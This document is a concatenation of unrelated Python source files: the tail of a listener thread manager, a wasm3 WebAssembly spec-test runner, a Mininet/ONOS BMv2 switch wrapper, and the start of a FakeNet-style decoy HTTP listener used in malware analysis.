return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
|
run-spec-test.py | #!/usr/bin/env python3
# Author: Volodymyr Shymanskyy
# Usage:
# ./run-spec-test.py
# ./run-spec-test.py --spec=opam-1.1.1
# ./run-spec-test.py .spec-v1.1/core/i32.json
# ./run-spec-test.py .spec-v1.1/core/float_exprs.json --line 2070
# ./run-spec-test.py .spec-v1.1/proposals/tail-call/*.json
# ./run-spec-test.py --exec "../build-custom/wasm3 --repl"
#
# Running WASI version with different engines:
# cp ../build-wasi/wasm3.wasm ./
# ./run-spec-test.py --exec "../build/wasm3 wasm3.wasm --repl"
# ./run-spec-test.py --exec "wasmtime --dir=. wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer run --dir=. wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer run --dir=. --backend=llvm wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer-js run wasm3.wasm --dir=. -- --repl"
# ./run-spec-test.py --exec "wasirun wasm3.wasm --repl"
# ./run-spec-test.py --exec "wavm run --mount-root ./ wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "iwasm --dir=. wasm3.wasm --repl"
#
# TODO
# - Get more tests from: https://github.com/microsoft/ChakraCore/tree/master/test/WasmSpec
# - Fix "Empty Stack" check
# - Check Canonical NaN and Arithmetic NaN separately
# - Fix imports.wast
import argparse
import os, sys, glob, time
import subprocess
import json
import re
import struct
import math
import pathlib
scriptDir = os.path.dirname(os.path.abspath(sys.argv[0]))
sys.path.append(os.path.join(scriptDir, '..', 'extra'))
from testutils import *
from pprint import pprint
#
# Args handling
#
parser = argparse.ArgumentParser()
parser.add_argument("--exec", metavar="<interpreter>", default="../build/wasm3 --repl")
parser.add_argument("--spec", default="v1.1")
parser.add_argument("--timeout", type=int, default=30)
parser.add_argument("--line", metavar="<source line>", type=int)
parser.add_argument("--all", action="store_true")
parser.add_argument("--show-logs", action="store_true")
parser.add_argument("--format", choices=["raw", "hex", "fp"], default="fp")
parser.add_argument("-v", "--verbose", action="store_true")
parser.add_argument("-s", "--silent", action="store_true")
parser.add_argument("file", nargs='*')
args = parser.parse_args()
if args.line:
args.show_logs = True
#
# Utilities
#
log = open("spec-test.log","w+")
log.write("======================\n")
def warning(msg, force=False):
log.write("Warning: " + msg + "\n")
log.flush()
if args.verbose or force:
print(f"{ansi.WARNING}Warning:{ansi.ENDC} {msg}")
def fatal(msg):
log.write("Fatal: " + msg + "\n")
log.flush()
print(f"{ansi.FAIL}Fatal:{ansi.ENDC} {msg}")
sys.exit(1)
def safe_fn(fn):
keepcharacters = (' ','.','_','-')
return "".join(c for c in fn if c.isalnum() or c in keepcharacters).strip()
def binaryToFloat(num, t):
if t == "f32":
return struct.unpack('!f', struct.pack('!L', int(num)))[0]
elif t == "f64":
return struct.unpack('!d', struct.pack('!Q', int(num)))[0]
else:
fatal(f"Unknown type '{t}'")
def escape_str(s):
if s == "":
return r'\x00'
if all((ord(c) < 128 and c.isprintable() and c not in " \n\r\t\\") for c in s):
return s
return '\\x' + '\\x'.join('{0:02x}'.format(x) for x in s.encode('utf-8'))
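# Illustrative behaviour:
#   escape_str("abc") -> "abc"            (printable ASCII passes through)
#   escape_str("a b") -> "\x61\x20\x62"   (whitespace forces full hex escaping)
#   escape_str("")    -> "\x00"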
#
# Value format options
#
def formatValueRaw(num, t):
return str(num)
def formatValueHex(num, t):
if t == "f32" or t == "i32":
return "{0:#0{1}x}".format(int(num), 8+2)
elif t == "f64" or t == "i64":
return "{0:#0{1}x}".format(int(num), 16+2)
else:
return str(num)
def formatValueFloat(num, t):
if t == "f32":
s = 6
elif t == "f64":
s = 10
else:
return str(num)
result = "{0:.{1}f}".format(binaryToFloat(num, t), s).rstrip('0')
if result.endswith('.'):
result = result + '0'
if len(result) > s*2:
result = "{0:.{1}e}".format(binaryToFloat(num, t), s)
return result
formatters = {
'raw': formatValueRaw,
'hex': formatValueHex,
'fp': formatValueFloat,
}
formatValue = formatters[args.format]
if args.format == "fp":
print("When using fp display format, values are compared loosely (some tests may produce false positives)")
#
# Spec tests preparation
#
spec_dir = os.path.join(".", ".spec-" + safe_fn(args.spec))
if not (os.path.isdir(spec_dir)):
from io import BytesIO
from zipfile import ZipFile
from urllib.request import urlopen
officialSpec = f"https://github.com/wasm3/wasm-core-testsuite/archive/{args.spec}.zip"
print(f"Downloading {officialSpec}")
resp = urlopen(officialSpec)
with ZipFile(BytesIO(resp.read())) as zipFile:
for zipInfo in zipFile.infolist():
if re.match(r".*-.*/.*/.*(\.wasm|\.json)", zipInfo.filename):
parts = pathlib.Path(zipInfo.filename).parts
newpath = str(pathlib.Path(*parts[1:-1]))
newfn = str(pathlib.Path(*parts[-1:]))
ensure_path(os.path.join(spec_dir, newpath))
newpath = os.path.join(spec_dir, newpath, newfn)
zipInfo.filename = newpath
zipFile.extract(zipInfo)
#
# Wasm3 REPL
#
from subprocess import Popen, STDOUT, PIPE
from threading import Thread
from queue import Queue, Empty
import shlex
class Wasm3():
def __init__(self, exe):
self.exe = exe
self.p = None
self.loaded = None
self.timeout = args.timeout
self.autorestart = True
self.run()
def run(self):
if self.p:
self.terminate()
cmd = shlex.split(self.exe)
#print(f"wasm3: Starting {' '.join(cmd)}")
self.q = Queue()
self.p = Popen(cmd, bufsize=0, stdin=PIPE, stdout=PIPE, stderr=STDOUT)
def _read_output(out, queue):
for data in iter(lambda: out.read(1024), b''):
queue.put(data)
queue.put(None)
self.t = Thread(target=_read_output, args=(self.p.stdout, self.q))
self.t.daemon = True
self.t.start()
try:
self._read_until("wasm3> ")
except Exception as e:
print(f"wasm3: Could not start: {e}")
def restart(self):
print(f"wasm3: Restarting")
for i in range(10):
try:
self.run()
try:
if self.loaded:
self.load(self.loaded)
except Exception as e:
pass
break
except Exception as e:
print(f"wasm3: {e} => retry")
time.sleep(0.1)
def init(self):
return self._run_cmd(f":init\n")
def version(self):
return self._run_cmd(f":version\n")
def load(self, fn):
self.loaded = None
with open(fn,"rb") as f:
wasm = f.read()
res = self._run_cmd(f":load-hex {len(wasm)}\n{wasm.hex()}\n")
self.loaded = fn
return res
def invoke(self, cmd):
return self._run_cmd(":invoke " + " ".join(map(str, cmd)) + "\n")
def _run_cmd(self, cmd):
if self.autorestart and not self._is_running():
self.restart()
self._flush_input()
#print(f"wasm3: {cmd.strip()}")
self._write(cmd)
return self._read_until("wasm3> ")
def _read_until(self, token):
buff = ""
tout = time.time() + self.timeout
error = None
while time.time() < tout:
try:
data = self.q.get(timeout=0.1)
if data is None:
error = "Crashed"
break
buff = buff + data.decode("utf-8")
idx = buff.rfind(token)
if idx >= 0:
return buff[0:idx].strip()
except Empty:
pass
else:
error = "Timeout"
self.terminate()
raise Exception(error)
def _write(self, data):
self.p.stdin.write(data.encode("utf-8"))
self.p.stdin.flush()
def _is_running(self):
return self.p and (self.p.poll() is None)
def _flush_input(self):
while not self.q.empty():
self.q.get()
def terminate(self):
self.p.stdin.close()
self.p.terminate()
self.p.wait(timeout=1.0)
self.p = None
#
# Multi-value result handling
#
def parseResults(s):
values = s.split(", ")
values = [x.split(":") for x in values]
values = [{ "type": x[1], "value": int(x[0]) } for x in values]
return normalizeResults(values)
def normalizeResults(values):
for x in values:
t = x["type"]
v = x["value"]
if t == "f32" or t == "f64":
if v == "nan:canonical" or v == "nan:arithmetic" or math.isnan(binaryToFloat(v, t)):
x["value"] = "nan:any"
else:
x["value"] = formatValue(v, t)
else:
x["value"] = formatValue(v, t)
return values
def combineResults(values):
values = [x["value"]+":"+x["type"] for x in values]
return ", ".join(values)
#
# Actual test
#
wasm3 = Wasm3(args.exec)
wasm3_ver = wasm3.version()
print(wasm3_ver)
blacklist = Blacklist([
"float_exprs.wast:* f32.nonarithmetic_nan_bitpattern*",
"imports.wast:*",
"names.wast:* *.wasm \\x00*", # names that start with '\0'
])
if wasm3_ver in Blacklist(["* on i386* MSVC *", "* on i386* Clang * for Windows"]):
warning("Win32 x86 has i64->f32 conversion precision issues, skipping some tests", True)
# See: https://docs.microsoft.com/en-us/cpp/c-runtime-library/floating-point-support
blacklist.add([
"conversions.wast:* f32.convert_i64_u(9007199791611905)",
"conversions.wast:* f32.convert_i64_u(9223371761976868863)",
"conversions.wast:* f32.convert_i64_u(9223372586610589697)",
])
elif wasm3_ver in Blacklist(["* on mips* GCC *"]):
warning("MIPS has NaN representation issues, skipping some tests", True)
blacklist.add([
"float_exprs.wast:* *_nan_bitpattern(*",
"float_exprs.wast:* *no_fold_*",
])
elif wasm3_ver in Blacklist(["* on sparc* GCC *"]):
warning("SPARC has NaN representation issues, skipping some tests", True)
blacklist.add([
"float_exprs.wast:* *.canonical_nan_bitpattern(0, 0)",
])
stats = dotdict(total_run=0, skipped=0, failed=0, crashed=0, timeout=0, success=0, missing=0)
# Convert some trap names from the original spec
trapmap = {
"unreachable": "unreachable executed"
}
def runInvoke(test):
test.cmd = [test.action.field]
displayArgs = []
for arg in test.action.args:
test.cmd.append(arg['value'])
displayArgs.append(formatValue(arg['value'], arg['type']))
test_id = f"{test.source} {test.wasm} {test.cmd[0]}({', '.join(test.cmd[1:])})"
if test_id in blacklist and not args.all:
warning(f"Skipped {test_id} (blacklisted)")
stats.skipped += 1
return
if args.verbose:
print(f"Running {test_id}")
stats.total_run += 1
output = ""
actual = None
actual_val = None
force_fail = False
try:
output = wasm3.invoke(test.cmd)
except Exception as e:
actual = f"<{e}>"
force_fail = True
# Parse the actual output
if not actual:
result = re.findall(r'Result: (.*?)$', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "result " + result[-1]
actual_val = result[0]
if not actual:
result = re.findall(r'Error: \[trap\] (.*?) \(', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "trap " + result[-1]
if not actual:
result = re.findall(r'Error: (.*?)$', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "error " + result[-1]
if not actual:
actual = "<No Result>"
force_fail = True
if actual == "error no operation ()":
actual = "<Not Implemented>"
stats.missing += 1
force_fail = True
elif actual == "<Crashed>":
stats.crashed += 1
force_fail = True
elif actual == "<Timeout>":
stats.timeout += 1
force_fail = True
# Prepare the expected result
expect = None
if "expected" in test:
if len(test.expected) == 0:
expect = "result <Empty Stack>"
else:
if actual_val is not None:
actual = "result " + combineResults(parseResults(actual_val))
expect = "result " + combineResults(normalizeResults(test.expected))
elif "expected_trap" in test:
if test.expected_trap in trapmap:
test.expected_trap = trapmap[test.expected_trap]
expect = "trap " + str(test.expected_trap)
elif "expected_anything" in test:
expect = "<Anything>"
else:
expect = "<Unknown>"
def showTestResult():
print(" ----------------------")
print(f"Test: {ansi.HEADER}{test_id}{ansi.ENDC}")
print(f"Args: {', '.join(displayArgs)}")
print(f"Expected: {ansi.OKGREEN}{expect}{ansi.ENDC}")
print(f"Actual: {ansi.WARNING}{actual}{ansi.ENDC}")
if args.show_logs and len(output):
print(f"Log:")
print(output)
log.write(f"{test.source}\t|\t{test.wasm} {test.action.field}({', '.join(displayArgs)})\t=>\t\t")
if actual == expect or (expect == "<Anything>" and not force_fail):
stats.success += 1
log.write(f"OK: {actual}\n")
if args.line:
showTestResult()
else:
stats.failed += 1
log.write(f"FAIL: {actual}, should be: {expect}\n")
if args.silent:
return
showTestResult()
#sys.exit(1)
if args.file:
jsonFiles = args.file
else:
jsonFiles = glob.glob(os.path.join(spec_dir, "core", "*.json"))
jsonFiles += glob.glob(os.path.join(spec_dir, "proposals", "sign-extension-ops", "*.json"))
jsonFiles += glob.glob(os.path.join(spec_dir, "proposals", "nontrapping-float-to-int-conversions", "*.json"))
jsonFiles = list(map(lambda x: os.path.relpath(x, scriptDir), jsonFiles))
jsonFiles.sort()
for fn in jsonFiles:
with open(fn, encoding='utf-8') as f:
data = json.load(f)
wast_source = filename(data["source_filename"])
wasm_module = ""
print(f"Running {fn}")
wasm3.init()
for cmd in data["commands"]:
test = dotdict()
test.line = int(cmd["line"])
test.source = wast_source + ":" + str(test.line)
test.wasm = wasm_module
test.type = cmd["type"]
if test.type == "module":
wasm_module = cmd["filename"]
if args.verbose:
print(f"Loading {wasm_module}")
try:
wasm_fn = os.path.join(pathname(fn), wasm_module)
res = wasm3.load(wasm_fn)
if res:
warning(res)
except Exception as e:
pass #fatal(str(e))
elif ( test.type == "action" or
test.type == "assert_return" or
test.type == "assert_trap" or
test.type == "assert_exhaustion" or
test.type == "assert_return_canonical_nan" or
test.type == "assert_return_arithmetic_nan"):
if args.line and test.line != args.line:
continue
if test.type == "action":
test.expected_anything = True
elif test.type == "assert_return":
test.expected = cmd["expected"]
elif test.type == "assert_return_canonical_nan":
test.expected = cmd["expected"]
test.expected[0]["value"] = "nan:canonical"
elif test.type == "assert_return_arithmetic_nan":
test.expected = cmd["expected"]
test.expected[0]["value"] = "nan:arithmetic"
elif test.type == "assert_trap":
test.expected_trap = cmd["text"]
elif test.type == "assert_exhaustion":
test.expected_trap = "stack overflow"
else:
stats.skipped += 1
warning(f"Skipped {test.source} ({test.type} not implemented)")
continue
test.action = dotdict(cmd["action"])
if test.action.type == "invoke":
# TODO: invoking in modules not implemented
if test.action.module:
stats.skipped += 1
warning(f"Skipped {test.source} (invoke in module)")
continue
test.action.field = escape_str(test.action.field)
runInvoke(test)
else:
stats.skipped += 1
warning(f"Skipped {test.source} (unknown action type '{test.action.type}')")
# These are irrelevant
elif (test.type == "assert_invalid" or
test.type == "assert_malformed" or
test.type == "assert_uninstantiable"):
pass
# Others - report as skipped
else:
stats.skipped += 1
warning(f"Skipped {test.source} ('{test.type}' not implemented)")
if (stats.failed + stats.success) != stats.total_run:
warning("Statistics summary invalid", True)
pprint(stats)
if stats.failed > 0:
failed = (stats.failed*100)/stats.total_run
print(f"{ansi.FAIL}=======================")
print(f" FAILED: {failed:.2f}%")
if stats.crashed > 0:
print(f" Crashed: {stats.crashed}")
print(f"======================={ansi.ENDC}")
sys.exit(1)
elif stats.success > 0:
print(f"{ansi.OKGREEN}=======================")
print(f" {stats.success}/{stats.total_run} tests OK")
if stats.skipped > 0:
print(f"{ansi.WARNING} ({stats.skipped} tests skipped){ansi.OKGREEN}")
print(f"======================={ansi.ENDC}")
elif stats.total_run == 0:
print("Error: No tests run")
sys.exit(1)
|
bmv2.py | import json
import multiprocessing
import os
import random
import re
import socket
import threading
import urllib2
from contextlib import closing
import time
from mininet.log import info, warn
from mininet.node import Switch, Host
SIMPLE_SWITCH_GRPC = 'simple_switch_grpc'
PKT_BYTES_TO_DUMP = 80
VALGRIND_PREFIX = 'valgrind --leak-check=yes'
SWITCH_START_TIMEOUT = 5 # seconds
BMV2_LOG_LINES = 5
BMV2_DEFAULT_DEVICE_ID = 1
def parseBoolean(value):
if value in ['1', 1, 'true', 'True']:
return True
else:
return False
def pickUnusedPort():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
addr, port = s.getsockname()
s.close()
return port
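# Note: the probe socket is closed before the port is actually used, so
# another process could grab it in the meantime; acceptable for test setups.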
def writeToFile(path, value):
with open(path, "w") as f:
f.write(str(value))
def watchDog(sw):
while True:
if ONOSBmv2Switch.mininet_exception == 1:
sw.killBmv2(log=False)
return
if sw.stopped:
return
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
if s.connect_ex(('127.0.0.1', sw.grpcPort)) == 0:
time.sleep(1)
else:
warn("\n*** WARN: BMv2 instance %s died!\n" % sw.name)
sw.printBmv2Log()
print ("-" * 80) + "\n"
return
class ONOSHost(Host):
def __init__(self, name, inNamespace=True, **params):
Host.__init__(self, name, inNamespace=inNamespace, **params)
def config(self, **params):
r = super(Host, self).config(**params)
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload %s %s off" \
% (self.defaultIntf(), off)
self.cmd(cmd)
# disable IPv6
self.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
return r
class ONOSBmv2Switch(Switch):
"""BMv2 software switch with gRPC server"""
# Shared value used to notify all instances of this class that a Mininet
# exception occurred. Mininet exception handling doesn't call the stop()
# method, so the mn process would hang after clean-up since Bmv2 would still
# be running.
mininet_exception = multiprocessing.Value('i', 0)
def __init__(self, name, json=None, debugger=False, loglevel="warn",
elogger=False, grpcport=None, cpuport=255, notifications=False,
thriftport=None, netcfg=True, dryrun=False, pipeconf="",
pktdump=False, valgrind=False, gnmi=False,
portcfg=True, onosdevid=None, **kwargs):
Switch.__init__(self, name, **kwargs)
self.grpcPort = grpcport
self.thriftPort = thriftport
self.cpuPort = cpuport
self.json = json
self.debugger = parseBoolean(debugger)
self.notifications = parseBoolean(notifications)
self.loglevel = loglevel
# Important: Mininet removes all /tmp/*.log files in case of exceptions.
# We want to be able to see the bmv2 log if anything goes wrong, hence
# avoid the .log extension.
self.logfile = '/tmp/bmv2-%s-log' % self.name
self.elogger = parseBoolean(elogger)
self.pktdump = parseBoolean(pktdump)
self.netcfg = parseBoolean(netcfg)
self.dryrun = parseBoolean(dryrun)
self.valgrind = parseBoolean(valgrind)
self.netcfgfile = '/tmp/bmv2-%s-netcfg.json' % self.name
self.pipeconfId = pipeconf
self.injectPorts = parseBoolean(portcfg)
self.withGnmi = parseBoolean(gnmi)
self.longitude = kwargs['longitude'] if 'longitude' in kwargs else None
self.latitude = kwargs['latitude'] if 'latitude' in kwargs else None
if onosdevid is not None and len(onosdevid) > 0:
self.onosDeviceId = onosdevid
else:
self.onosDeviceId = "device:bmv2:%s" % self.name
self.logfd = None
self.bmv2popen = None
self.stopped = False
# Remove files from previous executions
self.cleanupTmpFiles()
def getSourceIp(self, dstIP):
"""
Queries the Linux routing table to get the source IP that can talk with
dstIP, and vice versa.
"""
ipRouteOut = self.cmd('ip route get %s' % dstIP)
r = re.search(r"src (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})", ipRouteOut)
return r.group(1) if r else None
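# Example (addresses illustrative): for dstIP 10.0.2.1 the command prints
# something like "10.0.2.1 dev eth0 src 10.0.2.15 uid 0 ..." and the regex
# extracts "10.0.2.15".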
def getDeviceConfig(self, srcIP):
basicCfg = {
"driver": "bmv2"
}
if self.longitude and self.latitude:
basicCfg["longitude"] = self.longitude
basicCfg["latitude"] = self.latitude
cfgData = {
"generalprovider": {
"p4runtime": {
"ip": srcIP,
"port": self.grpcPort,
"deviceId": BMV2_DEFAULT_DEVICE_ID,
"deviceKeyId": "p4runtime:%s" % self.onosDeviceId
},
"bmv2-thrift": {
"ip": srcIP,
"port": self.thriftPort
}
},
"piPipeconf": {
"piPipeconfId": self.pipeconfId
},
"basic": basicCfg
}
if self.withGnmi:
cfgData["generalprovider"]["gnmi"] = {
"ip": srcIP,
"port": self.grpcPort
}
if self.injectPorts:
portData = {}
portId = 1
for intfName in self.intfNames():
if intfName == 'lo':
continue
portData[str(portId)] = {
"number": portId,
"name": intfName,
"enabled": True,
"removed": False,
"type": "copper",
"speed": 10000
}
portId += 1
cfgData['ports'] = portData
return cfgData
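# The returned dict serializes to a netcfg fragment roughly like this
# (values illustrative):
# {
#   "generalprovider": {
#     "p4runtime": {"ip": "10.0.2.15", "port": 50001, "deviceId": 1,
#                   "deviceKeyId": "p4runtime:device:bmv2:s1"},
#     "bmv2-thrift": {"ip": "10.0.2.15", "port": 9090}
#   },
#   "piPipeconf": {"piPipeconfId": "<pipeconf id>"},
#   "basic": {"driver": "bmv2"},
#   "ports": {"1": {"number": 1, "name": "s1-eth1", "enabled": true, ...}}
# }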
def doOnosNetcfg(self, controllerIP):
"""
Notifies ONOS about the new device via Netcfg.
"""
srcIP = self.getSourceIp(controllerIP)
if not srcIP:
warn("*** WARN: unable to get switch IP address, won't do netcfg\n")
return
cfgData = {
"devices": {
self.onosDeviceId: self.getDeviceConfig(srcIP)
}
}
with open(self.netcfgfile, 'w') as fp:
json.dump(cfgData, fp, indent=4)
if not self.netcfg:
# Do not push config to ONOS.
return
# Build netcfg URL
url = 'http://%s:8181/onos/v1/network/configuration/' % controllerIP
# Instantiate password manager for HTTP auth
pm = urllib2.HTTPPasswordMgrWithDefaultRealm()
pm.add_password(None, url,
os.environ['ONOS_WEB_USER'],
os.environ['ONOS_WEB_PASS'])
urllib2.install_opener(urllib2.build_opener(
urllib2.HTTPBasicAuthHandler(pm)))
# Push config data to controller
req = urllib2.Request(url, json.dumps(cfgData),
{'Content-Type': 'application/json'})
try:
f = urllib2.urlopen(req)
print f.read()
f.close()
except urllib2.URLError as e:
warn("*** WARN: unable to push config to ONOS (%s)\n" % e.reason)
def start(self, controllers):
bmv2Args = [SIMPLE_SWITCH_GRPC] + self.grpcTargetArgs()
if self.valgrind:
bmv2Args = VALGRIND_PREFIX.split() + bmv2Args
cmdString = " ".join(bmv2Args)
if self.dryrun:
info("\n*** DRY RUN (not executing bmv2)")
info("\nStarting BMv2 target: %s\n" % cmdString)
writeToFile("/tmp/bmv2-%s-grpc-port" % self.name, self.grpcPort)
writeToFile("/tmp/bmv2-%s-thrift-port" % self.name, self.thriftPort)
try:
if not self.dryrun:
# Start the switch
self.logfd = open(self.logfile, "w")
self.bmv2popen = self.popen(cmdString,
stdout=self.logfd,
stderr=self.logfd)
self.waitBmv2Start()
# We want to be notified if BMv2 dies...
threading.Thread(target=watchDog, args=[self]).start()
self.doOnosNetcfg(self.controllerIp(controllers))
except Exception:
ONOSBmv2Switch.mininet_exception = 1
self.killBmv2()
self.printBmv2Log()
raise
def grpcTargetArgs(self):
if self.grpcPort is None:
self.grpcPort = pickUnusedPort()
if self.thriftPort is None:
self.thriftPort = pickUnusedPort()
args = ['--device-id %s' % str(BMV2_DEFAULT_DEVICE_ID)]
for port, intf in self.intfs.items():
if not intf.IP():
args.append('-i %d@%s' % (port, intf.name))
args.append('--thrift-port %s' % self.thriftPort)
if self.notifications:
ntfaddr = 'ipc:///tmp/bmv2-%s-notifications.ipc' % self.name
args.append('--notifications-addr %s' % ntfaddr)
if self.elogger:
nanologaddr = 'ipc:///tmp/bmv2-%s-nanolog.ipc' % self.name
args.append('--nanolog %s' % nanologaddr)
if self.debugger:
dbgaddr = 'ipc:///tmp/bmv2-%s-debug.ipc' % self.name
args.append('--debugger-addr %s' % dbgaddr)
args.append('--log-console')
if self.pktdump:
args.append('--pcap --dump-packet-data %s' % PKT_BYTES_TO_DUMP)
args.append('-L%s' % self.loglevel)
if not self.json:
args.append('--no-p4')
else:
args.append(self.json)
# gRPC target-specific options
args.append('--')
args.append('--cpu-port %s' % self.cpuPort)
args.append('--grpc-server-addr 0.0.0.0:%s' % self.grpcPort)
return args
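# With mostly-default options the assembled command line looks roughly like
# (ports are picked at runtime):
#   simple_switch_grpc --device-id 1 -i 1@s1-eth1 --thrift-port 9090 \
#       --log-console -Lwarn --no-p4 -- --cpu-port 255 \
#       --grpc-server-addr 0.0.0.0:50001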
def waitBmv2Start(self):
# Wait for switch to open gRPC port, before sending ONOS the netcfg.
# Include time-out just in case something hangs.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
endtime = time.time() + SWITCH_START_TIMEOUT
while True:
result = sock.connect_ex(('127.0.0.1', self.grpcPort))
if result == 0:
# The port is open. Let's go! (Close socket first)
sock.close()
break
# Port is not open yet. If there is time, we wait a bit.
if endtime > time.time():
time.sleep(0.1)
else:
# Time's up.
raise Exception("Switch did not start before timeout")
def printBmv2Log(self):
if os.path.isfile(self.logfile):
print "-" * 80
print "%s log (from %s):" % (self.name, self.logfile)
with open(self.logfile, 'r') as f:
lines = f.readlines()
if len(lines) > BMV2_LOG_LINES:
print "..."
for line in lines[-BMV2_LOG_LINES:]:
print line.rstrip()
@staticmethod
def controllerIp(controllers):
try:
# onos.py
clist = controllers[0].nodes()
except AttributeError:
clist = controllers
assert len(clist) > 0
return random.choice(clist).IP()
def killBmv2(self, log=False):
if self.bmv2popen is not None:
self.bmv2popen.kill()
if self.logfd is not None:
if log:
self.logfd.write("*** PROCESS TERMINATED BY MININET ***\n")
self.logfd.close()
def cleanupTmpFiles(self):
self.cmd("rm -f /tmp/bmv2-%s-*" % self.name)
def stop(self, deleteIntfs=True):
"""Terminate switch."""
self.stopped = True
self.killBmv2(log=True)
Switch.stop(self, deleteIntfs)
# Exports for bin/mn
switches = {'onosbmv2': ONOSBmv2Switch}
hosts = {'onoshost': ONOSHost}
|
HTTPListener.py | import logging
import os
import sys
import threading
import SocketServer
import BaseHTTPServer
import ssl
import socket
import posixpath
import mimetypes
import time
MIME_FILE_RESPONSE = {
'text/html': 'FakeNet.html',
'image/png': 'FakeNet.png',
'image/ico': 'FakeNet.ico',
'image/jpeg': 'FakeNet.jpg',
'application/octet-stream': 'FakeNetMini.exe',
'application/x-msdownload': 'FakeNetMini.exe',
'application/pdf': 'FakeNet.pdf',
'application/xml': 'FakeNet.html'
}
class HTTPListener():
if not mimetypes.inited:
mimetypes.init() # try to read system mime.types
extensions_map = mimetypes.types_map.copy()
extensions_map.update({
'': 'text/html', # Default
})
def __init__(self, config = {}, name = 'HTTPListener', logging_level = logging.DEBUG):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = '0.0.0.0'
self.server = None
self.logger.info('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.iteritems():
self.logger.debug(' %10s: %s', key, value)
# Initialize webroot directory
self.webroot_path = self.config.get('webroot','defaultFiles')
# Try absolute path first
if not os.path.exists(self.webroot_path):
# Try to locate the webroot directory relative to application path
self.webroot_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), self.webroot_path)
if not os.path.exists(self.webroot_path):
self.logger.error('Could not locate webroot directory: %s', self.webroot_path)
sys.exit(1)
def start(self):
self.logger.debug('Starting...')
self.server = ThreadedHTTPServer((self.local_ip, int(self.config.get('port'))), ThreadedHTTPRequestHandler)
self.server.logger = self.logger
self.server.config = self.config
self.server.webroot_path = self.webroot_path
self.server.extensions_map = self.extensions_map
if self.config.get('usessl') == 'Yes':
self.logger.debug('Using SSL socket.')
keyfile_path = 'privkey.pem'
if not os.path.exists(keyfile_path):
keyfile_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), keyfile_path)
if not os.path.exists(keyfile_path):
self.logger.error('Could not locate privkey.pem')
sys.exit(1)
certfile_path = 'server.pem'
if not os.path.exists(certfile_path):
certfile_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), certfile_path)
if not os.path.exists(certfile_path):
self.logger.error('Could not locate server.pem')
sys.exit(1)
self.server.socket = ssl.wrap_socket(self.server.socket, keyfile=keyfile_path, certfile=certfile_path, server_side=True, ciphers='RSA')
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.info('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
class ThreadedHTTPServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
def handle_error(self, request, client_address):
exctype, value = sys.exc_info()[:2]
self.logger.error('Error: %s', value)
class ThreadedHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def __init__(self, *args):
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args)
def setup(self):
self.request.settimeout(int(self.server.config.get('timeout', 10)))
BaseHTTPServer.BaseHTTPRequestHandler.setup(self)
def do_HEAD(self):
self.server.logger.info('Received HEAD request')
# Process request
self.server.logger.info('%s', '-'*80)
self.server.logger.info(self.requestline)
for line in str(self.headers).split("\n"):
self.server.logger.info(line)
self.server.logger.info('%s', '-'*80)
# Prepare response
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_GET(self):
self.server.logger.info('Received a GET request.')
# Process request
self.server.logger.info('%s', '-'*80)
self.server.logger.info(self.requestline)
for line in str(self.headers).split("\n"):
self.server.logger.info(line)
self.server.logger.info('%s', '-'*80)
# Get response type based on the requested path
response, response_type = self.get_response(self.path)
# Prepare response
self.send_response(200)
self.send_header("Content-Type", response_type)
self.send_header("Content-Length", len(response))
self.end_headers()
self.wfile.write(response)
def do_POST(self):
self.server.logger.info('Received a POST request')
post_body = ''
content_len = int(self.headers.get('content-length', 0))
post_body = self.rfile.read(content_len)
# Process request
self.server.logger.info('%s', '-'*80)
self.server.logger.info(self.requestline)
for line in str(self.headers).split("\n"):
self.server.logger.info(line)
for line in post_body.split("\n"):
self.server.logger.info(line)
self.server.logger.info('%s', '-'*80)
# Store HTTP Posts
if self.server.config.get('dumphttpposts') and self.server.config['dumphttpposts'].lower() == 'yes':
http_filename = "%s_%s.txt" % (self.server.config.get('dumphttppostsfileprefix', 'http'), time.strftime("%Y%m%d_%H%M%S"))
self.server.logger.info('Storing HTTP POST headers and data to %s.', http_filename)
http_f = open(http_filename, 'wb')
if http_f:
http_f.write(self.requestline + "\r\n")
http_f.write(str(self.headers) + "\r\n")
http_f.write(post_body)
http_f.close()
else:
self.server.logger.error('Failed to write HTTP POST headers and data to %s.', http_filename)
# Get response type based on the requested path
response, response_type = self.get_response(self.path)
# Prepare response
self.send_response(200)
self.send_header("Content-Type", response_type)
self.send_header("Content-Length", len(response))
self.end_headers()
self.wfile.write(response)
def get_response(self, path):
